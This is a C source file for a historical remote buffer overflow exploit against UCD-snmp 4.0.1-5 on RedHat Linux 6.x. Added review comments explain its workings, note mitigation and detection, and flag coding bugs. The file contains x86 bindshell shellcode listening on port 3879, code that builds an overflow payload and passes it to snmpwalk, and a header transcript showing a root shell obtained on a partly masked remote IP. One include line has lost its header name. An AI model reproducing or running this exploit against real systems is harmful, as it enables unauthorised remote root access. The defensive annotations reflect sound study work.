/*
**
** UCD-snmp-4.0.1-5 Remote Buffer Overflow exploit
**
** === Testing: =============================================================
**
** [x82@xpl017elz x82]$ id
** uid=501(x82) gid=501(x82) groups=501(x82)
** [x82@xpl017elz x82]$ ./snmpxpl -h 61.xx.177.32
**
** UCD-snmp-4.0.1-5 Remote Buffer Overflow exploit
**
** Exploit made by Xpl017Elz
**
** Shellcode Address: 0xbfffd710
** Host: 61.xx.177.32
** [&shellcode: 112byte] [NOP + shellcode: 144byte] [0x00] - total 257byte
** Open Port: 3879 (Default)
**
** Timeout: No Response from 61.xx.177.32
** [x82@xpl017elz x82]$ nc 61.xx.177.32 3879
** whoami;
** root
** pwd;
** /home/x82
** id;
** uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),
** 6(disk),10(wheel),503(secure)
**
** =========================================================================
**
** exploit by "you dong-hun"(Xpl017Elz),.
** My World: http://x82.i21c.net
**
*/

/*
 * NOTE(review): historical proof-of-concept against the ucd-snmp 4.0.1-5
 * package shipped with RedHat Linux 6.x (see DEFAULT_CODE below).  The
 * program does not talk to the network itself: it builds a 256-byte
 * argument in xOx[] and hands it to the local snmpwalk binary, which
 * carries it to the target.  Mitigation on the defending side is to retire
 * this ucd-snmp version and to keep SNMP unreachable from untrusted
 * networks; detection-wise, an oversized, non-printable argument reaching
 * an SNMP daemon from a non-management host is the signal.
 *
 * NOTE(review): the header name after "#include" was lost when this page was
 * extracted (most likely stripped as markup); it cannot be recovered from
 * the page and is left as-is.
 */
#include
#define DEFAULT 0
#define VALUES 112                 /* default byte count of the repeated return address */
#define HOST "127.0.0.1"           /* also fixes the size of host[] in main() — see below */
#define DEFAULT_CODE 0xbfffd710 /* RedHat Linux 6.x ucd-snmp-4.0.1-5 */
#define SNMPWALK "/usr/bin/snmpwalk" /* snmpwalk PATH */

/*
 * Entry point.  Options: -h host, -s return address (strtoul, base 0, so
 * 0x... works), -v number of bytes of repeated return address.  Payload
 * layout written into xOx[] (256 bytes plus the terminating 0 from bzero):
 *   [values/4 copies of shelladdr, little-endian] ['@' filler] [shellcode]
 * The banner calls the filler "NOP"; the byte is 0x40 (inc %eax on i386).
 *
 * NOTE(review): implicit int return type and no prototypes for banrl()/
 * usages() — pre-C99 style; a C99+ compiler rejects or warns on this.
 */
main(int argc, char *argv[])
{
    char shellcode[] = /* Linux(x86) bindshell on port 3879 */
        "\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
        "\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
        "\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0"
        "\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
        "\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
        "\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"
        "\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
        "\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";
    /*
     * NOTE(review): host[] is sized by the HOST literal (10 bytes including
     * the terminator), yet -h is copied into it with an unbounded strcpy()
     * below — any longer hostname overflows the tool's own stack.
     * connect[] is never used.
     */
    char xOx[257], connect[100], host[] = HOST, snmpwalk[] = SNMPWALK;
    int count = DEFAULT, num_1 = DEFAULT, num_2 = DEFAULT, num_3 = DEFAULT,
        jobst = DEFAULT, values = VALUES;
    unsigned long shelladdr = DEFAULT_CODE;
    extern char *optarg;

    bzero(xOx, 257);   /* zero-fill so the byte after the 256 payload bytes is 0 */
    banrl();

    while ((jobst = getopt(argc, argv, "h:s:v:")) != EOF)
        switch (jobst) {
        case 'h':
            strcpy(host, optarg);   /* unbounded copy into a 10-byte array (see above) */
            break;
        case 's':
            shelladdr = strtoul(optarg, NULL, 0);
            break;
        case 'v':
            /*
             * NOTE(review): atoi() result is not range-checked.  The guard
             * below only rejects values > 126; a negative value skips the
             * first loop, makes the '@' loop run past 256 bytes and
             * overruns xOx[].
             */
            values = atoi(optarg);
            break;
        case '?':
            usages(argv[0]);
            exit(0);
        }

    /* Segment 1: shelladdr repeated, one little-endian 4-byte word per iteration. */
    for (num_1 = 0; num_1 < (values / 4); num_1++) {
        xOx[count++] = (shelladdr >> 0) & 0xff;
        xOx[count++] = (shelladdr >> 8) & 0xff;
        xOx[count++] = (shelladdr >> 16) & 0xff;
        xOx[count++] = (shelladdr >> 24) & 0xff;
    }

    /* Reject values that would leave fewer than 0x82 bytes for filler + shellcode. */
    if ((0x100 - values) < 0x00000082) {
        printf("\n - Values error. :-(\n\n");
        printf(" Space that shellcode comes is so narrow.\n");
        printf(" Compose exploit again.\n\n");
        exit(0);
    }

    /*
     * Segment 2: '@' filler up to 256 - values - strlen(shellcode) bytes.
     * NOTE(review): signed/unsigned comparison — num_2 is int, the bound is
     * size_t because of strlen(); fine for the checked range, wrong if
     * values were ever negative.
     */
    for (num_2 = 0; num_2 < (0x100 - values) - strlen(shellcode); num_2++) {
        xOx[count++] = '@';
    }

    /* Segment 3: the shellcode bytes themselves (without the string terminator). */
    for (num_3 = 0; num_3 < strlen(shellcode); num_3++) {
        xOx[count++] = shellcode[num_3];
    }

    /* NOTE(review): %p expects a void *, not unsigned long — format mismatch. */
    printf(" Shellcode Address: %p\n", shelladdr);
    printf(" Host: %s\n", host);
    printf(" [&shellcode: %dbyte] [NOP + shellcode: %dbyte] [0x00] - total 257byte ",values,256-values);
    printf("Open Port: 3879 (Default)\n\n");

    /*
     * Replace this process with snmpwalk; host is argv[1], the payload is
     * argv[2].  NOTE(review): in the ucd-snmp command-line syntax that
     * position is the community string — confirm against the installed
     * snmpwalk.  execl() returns only on failure and that is not checked.
     */
    execl(snmpwalk, "snmpwalk", host, xOx, NULL);
}

/* Print the banner shown in the transcript above. */
banrl()
{
    printf("\n UCD-snmp-4.0.1-5 Remote Buffer Overflow exploit\n\n");
    printf("\t\t Exploit made by Xpl017Elz\n\n");
}

/* Print usage; var is argv[0]. Called on an unknown option, then the program exits. */
usages(char *var)
{
    printf("\n Usage: %s -h [hostname] -s [address] -v [value]\n",var);
    printf("\n option: -h - IP address & Domain name");
    printf("\n -s - Shellcode Address");
    printf("\n -v - &Shellcode Size\n\n");
    printf("\n example: %s -h 127.0.0.1 -s 0xbfffd710 -v 112\n\n",var);
}